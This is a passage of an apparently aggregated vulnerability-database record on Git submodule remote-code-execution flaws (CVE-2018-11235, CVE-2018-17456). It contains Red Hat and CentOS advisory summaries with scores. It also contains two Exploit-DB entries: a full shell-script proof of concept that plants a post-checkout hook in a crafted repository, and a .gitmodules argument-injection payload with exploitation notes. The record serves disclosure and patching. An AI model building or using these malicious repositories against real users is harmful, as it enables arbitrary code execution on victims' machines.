*/ \nint len = external_specification_len(url); \nchar *handler = xmemdupz(url, len); \ntransport_helper_init(ret, handler); \n} \n \nif (ret->smart_options) { \nret->smart_options->thin = 1; \nret->smart_options->uploadpack = \"git-upload-pack\"; \nif (remote->uploadpack) \nret->smart_options->uploadpack = remote->uploadpack; \nret->smart_options->receivepack = \"git-receive-pack\"; \nif (remote->receivepack) \nret->smart_options->receivepack = remote->receivepack; \n} \n``` \n \n## Further hints \n \nThe constraint to have a colon in the `path` seems to hinder exploitation on Windows \nas a colon is a forbidden character within a path on Windows. However as noted by \nsome people during the disclosure: Git running within the Windows Subsystem for Linux or \ncygwin will allow exploitation on Windows hosts. \n \nEtienne Stalmans who found [a similar issue](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/) \nearlier this year managed to exploit this argument injection [using `--template`](https://twitter.com/_staaldraad/status/1049241254939246592). \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/149836/gitsubmod-exec.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2021-10-19T20:40:13", "description": "Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. 
This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n* git: arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-20T22:09:22", "type": "redhat", "title": "(RHSA-2018:1957) Important: git security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-06-20T22:14:33", "id": "RHSA-2018:1957", "href": "https://access.redhat.com/errata/RHSA-2018:1957", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:39:49", "description": "Git is a distributed revision control system with a decentralized architecture. 
As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n* git: arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\n\n* git: path sanity check in is_ntfs_dotgit() can read arbitrary memory (CVE-2018-11233)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-10T08:08:55", "type": "redhat", "title": "(RHSA-2018:2147) Important: rh-git29-git security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2018-07-10T08:11:57", "id": "RHSA-2018:2147", "href": 
"https://access.redhat.com/errata/RHSA-2018:2147", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2022-02-27T11:51:02", "description": "**CentOS Errata and Security Advisory** CESA-2018:1957\n\n\nGit is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n* git: arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2018-June/059843.html\n\n**Affected packages:**\nemacs-git\nemacs-git-el\ngit\ngit-all\ngit-bzr\ngit-cvs\ngit-daemon\ngit-email\ngit-gui\ngit-hg\ngit-p4\ngit-svn\ngitk\ngitweb\nperl-Git\nperl-Git-SVN\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2018:1957", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-22T17:15:23", "type": "centos", "title": "emacs, git, gitk, gitweb, perl security update", "bulletinFamily": "unix", "cvss2": {"severity": 
"MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-06-22T17:15:23", "id": "CESA-2018:1957", "href": "https://lists.centos.org/pipermail/centos-announce/2018-June/059843.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2018-06-01T18:11:28", "description": "Git < 2.17.1 - Remote Code Execution. CVE-2018-11235. Remote exploit for Linux platform", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-01T00:00:00", "type": "exploitdb", "title": "Git < 2.17.1 - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": 
"2018-06-01T00:00:00", "id": "EDB-ID:44822", "href": "https://www.exploit-db.com/exploits/44822/", "sourceData": "# Exploit Title: Git (code execution)\r\n# Date: 2018-05-29\r\n# Exploit Author: JameelNabbo\r\n# Website: jameelnabbo.com <http://jameelnabbo.com/>\r\n# Vendor Homepage: https://github.com/git/git <https://github.com/git/git>\r\n# CVE: CVE-2018-11235\r\n #Version: <=2.17.1 \r\n# Tested on Kali Linux\r\n\r\n\r\nP0C:\r\n\r\nCreate two files:\r\npwned.sh: the file which will contain our commands to be executed \r\ncommit.sh the fole which contain a normal build with a bit of calls to our pwned.sh file\r\n\r\nadd the follwing to Pwned.sh:\r\n#!/bin/sh\r\ncat << EOF\r\n\r\n#here we can put our lovely commands\r\nExploited! : $(ifconfig)\r\n\r\nEOF\r\n\r\n#--------\r\n\r\nAdd the follwing to commit.sh file:\r\n#!/bin/sh\r\n\r\nset -e\r\n\r\nrepo_dir=\"$PWD/repo\"\r\n#change it to any other Repo\r\nrepo_submodule='https://github.com/JameelNabbo/SmartWorm'\r\n\r\ngit init \"$repo_dir\"\r\ncd \"$repo_dir\"\r\ngit submodule add \"$repo_submodule\" pwned\r\nmkdir modules\r\ncp -r .git/modules/pwned modules\r\ncp ../pwned.sh modules/pwned/hooks/post-checkout\r\ngit config -f .gitmodules submodule.pwned.update checkout\r\ngit config -f .gitmodules --rename-section submodule.pwned submodule.../../modules/pwned\r\ngit add modules\r\ngit submodule add \"$repo_submodule\"\r\ngit add SmartWorm\r\ngit commit -am pwned\r\necho \"All done, now \\`git clone --recurse-submodules \\\"$repo_dir\\\" dest_dir\\`\u201d\r\n\r\n\r\n\u2014\u2014\u2014\u2014\u2014\u2014\r\nSolution:\r\nhttps://www.edwardthomson.com/blog/upgrading_git_for_cve2018_11235.html", "sourceHref": "https://www.exploit-db.com/download/44822/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-13T05:34:45", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-16T00:00:00", "type": "exploitdb", "title": "Git Submodule - Arbitrary Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235", "CVE-2018-17456", "2018-17456"], "modified": "2018-10-16T00:00:00", "id": "EDB-ID:45631", "href": "https://www.exploit-db.com/exploits/45631", "sourceData": "# CVE-2018-17456\r\n\r\nI've gotten a couple of questions about exploitation for the\r\n[recent RCE](https://marc.info/?l=git&m=153875888916397&w=2) in Git. So here we\r\ngo with some technical details.\r\n\r\n## TL;DR\r\n\r\n[Here](https://github.com/joernchen/poc-submodule) is a PoC repository.\r\nEDB Note: Mirror ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45631.zip\r\n\r\n## Exploitation\r\n\r\nThe `.gitmodules` file looks as follows:\r\n\r\n```\r\n[submodule \"x:x\"]\r\n\tpath = x:x\r\n\turl = -u./payload\r\n```\r\n\r\nThe actual command being injected is set by the url, `-u./payload`\r\npoints the `upload-pack` flag of git clone to the `payload` shell\r\nscript. 
Note also the `:` within the path, this part is needed to\r\nactually get the `payload` script executed.\r\n\r\nThe path will end up as the repository URL in the subsequent `clone`\r\noperation:\r\n\r\n```\r\nexecve(\"/usr/lib/git-core/git\", [\"/usr/lib/git-core/git\", \"clone\",\r\n\"--no-checkout\", \"--progress\", \"--separate-git-dir\",\r\n\"/tmp/huhu/.git/modules/x:x\", \"-u./payload\", \"/tmp/huhu/x:x\"],...\r\n```\r\n\r\nAs the actual URL from `.gitmodules` is interpreted as the `-u`\r\nargument.\r\n\r\nThe colon